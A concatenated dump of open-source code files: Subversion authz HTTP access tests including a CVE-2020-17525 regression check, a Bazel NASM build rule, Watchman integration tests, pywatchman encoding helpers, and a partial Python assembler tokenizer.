{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
)
verify_gets(test_area_url, sallrany_tests)
# See comments on authn_sallrany test for some background on the interaction
# of Satisfy Any and the newer Require blocks.
@SkipUnless(svntest.main.is_httpd_authz_provider_enabled)
def authn_sallrall(sbox):
"test satisfy all require all config"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/sallrall')
write_authz_file(sbox)
allow_header = { 'ALLOW': '1' }
sallrall_tests = (
# anon access isn't allowed without the ALLOW header
{ 'path': '', 'status': 403, },
{ 'path': '/', 'status': 403, },
{ 'path': '/repos', 'status': 403, },
{ 'path': '/repos/', 'status': 403, },
{ 'path': '/repos/A', 'status': 403, },
{ 'path': '/repos/A/', 'status': 403, },
{ 'path': '/repos/A/D', 'status': 403, },
{ 'path': '/repos/A/D/', 'status': 403, },
{ 'path': '/repos/A/D/gamma', 'status': 403, },
{ 'path': '/repos/A/D/H', 'status': 403, },
{ 'path': '/repos/A/D/H/', 'status': 403, },
{ 'path': '/repos/A/D/H/chi', 'status': 403, },
# auth is configured but no access is allowed without the ALLOW header
{ 'path': '', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1, 'pw': user1_badpass},
# auth is configured but no access is allowed without the ALLOW header
{ 'path': '', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_badpass},
# anon is not allowed even with the ALLOW header
{ 'path': '', 'status': 401, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'headers': allow_header },
# auth is configured and user1 is allowed access to the repo, including H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass, 'headers': allow_header },
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass, 'headers': allow_header },
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass, 'headers': allow_header },
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass, 'headers': allow_header },
)
verify_gets(test_area_url, sallrall_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def repos_relative_access_file(sbox):
"repos-relative access file"
sbox.build()
test_area_url = sbox.repo_url.replace('/svn-test-work/repositories/',
'/authz-test-work/in-repos-authz/')
svntest.main.write_authz_file(sbox, {"/": "", "/A": "%s = rw" % user1})
shutil.move(sbox.authz_file, os.path.join(sbox.wc_dir, 'authz'))
sbox.simple_add('authz')
svntest.actions.run_and_verify_svn(None, [], 'relocate',
sbox.file_protocol_repo_url(), sbox.wc_dir)
sbox.simple_commit(message="adding in-repository authz rules file")
in_repos_authz_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/authz', 'status': 401, },
{ 'path': '/authz', 'user' : user1, 'pw' : user1_pass,
'status': 403, },
{ 'path': '/A', 'user' : user1, 'pw' : user1_pass,
'status': 301, },
{ 'path': '/A/', 'user' : user1, 'pw' : user1_pass,
'status': 200, },
)
verify_gets(test_area_url, in_repos_authz_tests)
# test for the bug also known as CVE-2020-17525
@SkipUnless(svntest.main.is_ra_type_dav)
def nonexistent_repos_relative_access_file(sbox):
"repos-relative access file with bad repository URL"
sbox.build()
test_area_url = sbox.repo_url.replace('/svn-test-work/repositories/',
'/authz-test-work/in-repos-authz/')
# Construct a bad test-area URL to see what happens if we attempt to access
# a repository in a subdirectory which does not exist in SVNParentPath.
# This used to crash the server with a NULL-pointer dereference upon
# unauthenticated access.
test_area_url += '-this/does/not/exist'
svntest.main.write_authz_file(sbox, {"/": "", "/A": "%s = rw" % user1})
shutil.move(sbox.authz_file, os.path.join(sbox.wc_dir, 'authz'))
sbox.simple_add('authz')
svntest.actions.run_and_verify_svn(None, [], 'relocate',
sbox.file_protocol_repo_url(), sbox.wc_dir)
sbox.simple_commit(message="adding in-repository authz rules file")
# access is denied across the board since this repository does not exist
in_repos_authz_tests = (
{ 'path': '', 'status': 401, },
{ 'path': '/authz', 'status': 401, },
{ 'path': '/authz', 'user' : user1, 'pw' : user1_pass,
'status': 403, },
{ 'path': '/A', 'user' : user1, 'pw' : user1_pass,
'status': 403, },
{ 'path': '/A/', 'user' : user1, 'pw' : user1_pass,
'status': 403, },
)
verify_gets(test_area_url, in_repos_authz_tests)
########################################################################
# Run the tests
# list all tests here, starting with None:
test_list = [ None,
anon,
mixed,
mixed_noauthwhenanon,
authn,
authn_anonoff,
authn_lcuser,
authn_group,
authn_sallrany,
authn_sallrall,
repos_relative_access_file,
nonexistent_repos_relative_access_file,
]
serial_only = True
if __name__ == '__main__':
svntest.main.run_tests(test_list)
# NOTREACHED
### End of file.
```
#### File: tests/cmdline/svneditor.py
```python
import sys
import os
def main():
if len(sys.argv) not in [2, 6]:
print("usage: svneditor.py file")
print(" svneditor.py base theirs mine merged wc_path")
print("arguments passed were: %s" % sys.argv)
sys.exit(1)
if len(sys.argv) == 2:
filename = sys.argv[1]
elif len(sys.argv) == 6:
filename = sys.argv[4]
# Read in the input file.
f = open(filename)
contents = f.read()
f.close()
funcname = os.environ['SVNTEST_EDITOR_FUNC']
func = sys.modules['__main__'].__dict__[funcname]
# Run the conversion.
contents = func(contents)
# Write edited version back to the file.
f = open(filename, 'w')
f.write(contents)
f.close()
return check_conflicts(contents)
def check_conflicts(contents):
markers = ['<<<<<<<', '=======', '>>>>>>>']
found = 0
for line in contents.split('\n'):
for marker in markers:
if line.startswith(marker):
found = found + 1
return found >= 3
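# Illustrative behaviour (made-up inputs, derived from the logic above):
# check_conflicts("<<<<<<< .mine\nours\n=======\ntheirs\n>>>>>>> .r42\n") -> True
# check_conflicts("no conflict markers here\n") -> False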
def foo_to_bar(m):
return m.replace('foo', 'bar')
def append_foo(m):
return m + 'foo\n'
def identity(m):
return m
exitcode = main()
sys.exit(exitcode)
``` |
{
"source": "0xgpapad/tensorstore",
"score": 2
} |
#### File: 0xgpapad/tensorstore/rules_nasm.bzl
```python
def _nasm_one_file(ctx):
src = ctx.file.src
out = ctx.outputs.out
raw_includes = ctx.attr.raw_includes
# Compute the set of -I<> directories as the dirname of each include
# as well as the prefix of the path to the include.
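# Illustrative example (hypothetical paths, not from this build): an include
# listed in raw_includes as "include/common.inc" that resolves to the file
# "external/nasm_lib/include/common.inc" contributes both
# "external/nasm_lib/include" (its dirname) and "external/nasm_lib"
# (the path with the raw suffix stripped), each emitted below as "-I<dir>/".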
includes = [x.dirname for x in ctx.files.includes]
for i in range(0, len(raw_includes)):
raw = raw_includes[i]
path = ctx.files.includes[i].path
if path.endswith(raw):
includes.append(path[:-len(raw)].rstrip("/"))
args = ctx.actions.args()
for h in depset(includes).to_list():
args.add("-I" + h + "/")
args.add_all(ctx.attr.flags)
args.add_all(["-o", out.path])
args.add(src.path)
inputs = [src] + ctx.files.includes
ctx.actions.run(
outputs = [out],
inputs = inputs,
executable = ctx.executable._nasm,
arguments = [args],
mnemonic = "NasmCompile",
progress_message = "Assembling " + src.short_path + " to create " + out.path,
)
nasm_one_file = rule(
attrs = {
"src": attr.label(allow_single_file = [".asm"]),
"includes": attr.label_list(allow_files = True),
"flags": attr.string_list(),
"raw_includes": attr.string_list(),
"_nasm": attr.label(
default = "@nasm//:nasm",
executable = True,
cfg = "host",
),
},
outputs = {"out": "%{name}.o"},
implementation = _nasm_one_file,
)
def nasm_library(name, srcs = [], includes = [], flags = [], linkstatic = 1, **kwargs):
for src in srcs:
nasm_one_file(
name = src[:-len(".asm")],
src = src,
includes = includes,
flags = flags,
raw_includes = includes,
)
native.cc_library(
name = name,
srcs = [src.replace(".asm", ".o") for src in srcs],
linkstatic = linkstatic,
**kwargs
)
``` |
{
"source": "0xgpapad/watchman",
"score": 2
} |
#### File: watchman/integration/test_name.py
```python
import os
import pywatchman
import WatchmanTestCase
@WatchmanTestCase.expand_matrix
class TestNameExpr(WatchmanTestCase.WatchmanTestCase):
def test_name_expr(self):
root = self.mkdtemp()
self.touchRelative(root, "foo.c")
os.mkdir(os.path.join(root, "subdir"))
self.touchRelative(root, "subdir", "bar.txt")
self.watchmanCommand("watch", root)
self.assertFileListsEqual(
self.watchmanCommand(
"query", root, {"expression": ["iname", "FOO.c"], "fields": ["name"]}
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["iname", ["FOO.c", "INVALID.txt"]], "fields": ["name"]},
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query", root, {"expression": ["name", "foo.c"], "fields": ["name"]}
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["name", ["foo.c", "invalid"]], "fields": ["name"]},
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["name", "foo.c", "wholename"], "fields": ["name"]},
)["files"],
["foo.c"],
)
if self.isCaseInsensitive():
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["name", "Foo.c", "wholename"], "fields": ["name"]},
)["files"],
["foo.c"],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{"expression": ["name", "bar.txt", "wholename"], "fields": ["name"]},
)["files"],
[],
)
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{
"expression": ["name", "bar.txt", "wholename"],
"relative_root": "subdir",
"fields": ["name"],
},
)["files"],
["bar.txt"],
)
# foo.c is not in subdir so this shouldn't return any matches
self.assertFileListsEqual(
self.watchmanCommand(
"query",
root,
{
"expression": ["name", "foo.c", "wholename"],
"relative_root": "subdir",
"fields": ["name"],
},
)["files"],
[],
)
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("query", root, {"expression": "name"})
self.assertRegex(str(ctx.exception), "Expected array for 'i?name' term")
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand(
"query", root, {"expression": ["name", "one", "two", "three"]}
)
self.assertRegex(
str(ctx.exception), "Invalid number of arguments for 'i?name' term"
)
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("query", root, {"expression": ["name", 2]})
self.assertRegex(
str(ctx.exception),
("Argument 2 to 'i?name' must be either a string " "or an array of string"),
)
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("query", root, {"expression": ["name", "one", 2]})
self.assertRegex(str(ctx.exception), "Argument 3 to 'i?name' must be a string")
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand(
"query", root, {"expression": ["name", "one", "invalid"]}
)
self.assertRegex(
str(ctx.exception), "Invalid scope 'invalid' for i?name expression"
)
```
#### File: watchman/integration/test_restrictions.py
```python
import os
import pywatchman
import WatchmanInstance
import WatchmanTestCase
@WatchmanTestCase.expand_matrix
class TestWatchRestrictions(WatchmanTestCase.WatchmanTestCase):
def test_rootRestrict(self):
config = {"root_restrict_files": [".git", ".foo"]}
expect = [
("directory", ".git", True),
("file", ".foo", True),
("directory", ".foo", True),
(None, None, False),
("directory", ".svn", False),
("file", "baz", False),
]
self.runWatchTests(config=config, expect=expect)
def runWatchTests(self, config, expect):
with WatchmanInstance.Instance(config=config) as inst:
inst.start()
client = self.getClient(inst)
for filetype, name, expect_pass in expect:
for watch_type in ["watch", "watch-project"]:
# encode the test criteria in the dirname so that we can
# figure out which test scenario failed more easily
d = self.mkdtemp(
suffix="-%s-%s-%s-%s"
% (filetype, name, expect_pass, watch_type)
)
if filetype == "directory":
os.mkdir(os.path.join(d, name))
elif filetype == "file":
self.touchRelative(d, name)
assert_functions = {
(True, "watch"): self.assertWatchSucceeds,
(True, "watch-project"): self.assertWatchProjectSucceeds,
(False, "watch"): self.assertWatchIsRestricted,
(False, "watch-project"): self.assertWatchProjectIsRestricted,
}
assert_function = assert_functions[(expect_pass, watch_type)]
assert_function(inst, client, d)
def assertWatchSucceeds(self, inst, client, path):
client.query("watch", path)
def assertWatchProjectSucceeds(self, inst, client, path):
client.query("watch-project", path)
def assertWatchIsRestricted(self, inst, client, path):
with self.assertRaises(pywatchman.WatchmanError) as ctx:
client.query("watch", path)
message = str(ctx.exception)
self.assertIn("unable to resolve root {0}".format(path), message)
self.assertIn(
(
"Your watchman administrator has configured watchman to "
+ "prevent watching path `{0}`"
).format(path),
message,
)
self.assertIn(
"None of the files listed in global config root_files are present "
+ "and enforce_root_files is set to true.",
message,
)
self.assertIn(
"root_files is defined by the `{0}` config file".format(inst.cfg_file),
message,
)
self.assertIn(
"config file and includes `.watchmanconfig`, `.git`, and `.foo`.", message
)
self.assertIn(
"One or more of these files must be present in order to allow a "
+ "watch. Try pulling and checking out a newer version of the "
+ "project?",
message,
)
def assertWatchProjectIsRestricted(self, inst, client, path):
with self.assertRaises(pywatchman.WatchmanError) as ctx:
client.query("watch-project", path)
message = str(ctx.exception)
self.assertIn(
(
"None of the files listed in global config root_files are "
+ "present in path `{0}` or any of its parent directories."
).format(path),
message,
)
self.assertIn(
"root_files is defined by the `{0}` config file".format(inst.cfg_file),
message,
)
self.assertIn(
"config file and includes `.watchmanconfig`, `.git`, and `.foo`.", message
)
self.assertIn(
"One or more of these files must be present in order to allow a "
+ "watch. Try pulling and checking out a newer version of the "
+ "project?",
message,
)
def test_invalidRoot(self):
d = self.mkdtemp()
invalid = os.path.join(d, "invalid")
with self.assertRaises(pywatchman.WatchmanError) as ctx:
self.watchmanCommand("watch", invalid)
msg = str(ctx.exception)
if "No such file or directory" in msg:
# unix
return
if "The system cannot find the file specified" in msg:
# windows
return
self.assertTrue(False, msg)
```
#### File: python/pywatchman/encoding.py
```python
import sys
from . import compat
"""Module to deal with filename encoding on the local system, as returned by
Watchman."""
if compat.PYTHON3:
default_local_errors = "surrogateescape"
def get_local_encoding():
if sys.platform == "win32":
# Watchman always returns UTF-8 encoded strings on Windows.
return "utf-8"
# On the Python 3 versions we support, sys.getfilesystemencoding never
# returns None.
return sys.getfilesystemencoding()
else:
# Python 2 doesn't support surrogateescape, so use 'strict' by
# default. Users can register a custom surrogateescape error handler and use
# that if they so desire.
default_local_errors = "strict"
def get_local_encoding():
if sys.platform == "win32":
# Watchman always returns UTF-8 encoded strings on Windows.
return "utf-8"
fsencoding = sys.getfilesystemencoding()
if fsencoding is None:
# This is very unlikely to happen, but if it does, just use UTF-8
fsencoding = "utf-8"
return fsencoding
def encode_local(s):
return s.encode(get_local_encoding(), default_local_errors)
def decode_local(bs):
return bs.decode(get_local_encoding(), default_local_errors)
``` |
{
"source": "0xGREG/Assembler",
"score": 3
} |
#### File: Assembler/assembler/Assembler.py
```python
from enum import Enum
from collections import namedtuple
import string
from assembler.formats._bin import BIN
from assembler.formats._elf import ELF
class AssemblerException(Exception):
pass
def setup(initialParameters):
processor = Processor(initialParameters)
processor.tokenize()
if initialParameters.verbose:
print('TOKENS:\n')
print("{: <8} {: <25} {}\n".format(
'LINE', 'TYPE', 'VALUE'))
for token in processor.tokens:
token.print()
print()
return processor
class tokenInfo:
def __init__(self, type, value):
self.value = value
self.type = type
class TYPES(Enum):
UNKNOWN = -1
COMMA = 0
INT = 1
STRING = 2
INSTRUCTION = 3
LABEL = 4
class Token:
def __init__(self, value, lineNumber):
self.setFunctionAssignments()
info = self.getTokenInfo(value)
self.type = info.type
self.value = info.value
self.lineNumber = lineNumber
def print(self):
print("{: <8} {: <25} {}".format(
self.lineNumber, self.type, self.value))
def setFunctionAssignments(self):
self.typeFunctions = [
self.checkComma,
self.checkNumber,
self.checkString,
self.checkLabel,
self.checkInstruction
]
def getTokenInfo(self, value):
for type in self.typeFunctions:
verifiedType = type(value)
if (verifiedType != None):
return verifiedType
return tokenInfo(TYPES.UNKNOWN, value)
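# Illustrative results of the checks below (line numbers made up):
# Token('0x1F', 1) -> type TYPES.INT, value 31
# Token('DB', 1) -> type TYPES.INSTRUCTION, value 'DB'
# Token('.start', 1) -> type TYPES.LABEL, value '.start'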
def checkComma(self, value):
if len(value) == 1 and value[0] == ',':
return tokenInfo(TYPES.COMMA, ',')
return None
def checkNumber(self, value):
variant = 'dec'
if len(value) > 2 and value[0:2] == '0x':
variant = 'hex'
digits = ''
finalValue = -1
if variant == 'dec':
for character in value:
if character in string.digits:
digits += character
else:
return None
finalValue = int(digits)
elif variant == 'hex':
for character in value[2:]:
if character in string.hexdigits:
digits += character
else:
return None
finalValue = int(digits, 16)
return tokenInfo(TYPES.INT, finalValue)
def checkString(self, value):
if len(value) < 2:
return None
if(value[0] in '"' and value[-1] == '"'):
return tokenInfo(TYPES.STRING, value)
return None
def checkInstruction(self, value):
for character in value:
if character not in string.ascii_uppercase:
return None
return tokenInfo(TYPES.INSTRUCTION, value)
def checkLabel(self, value):
if len(value) < 2:
return None
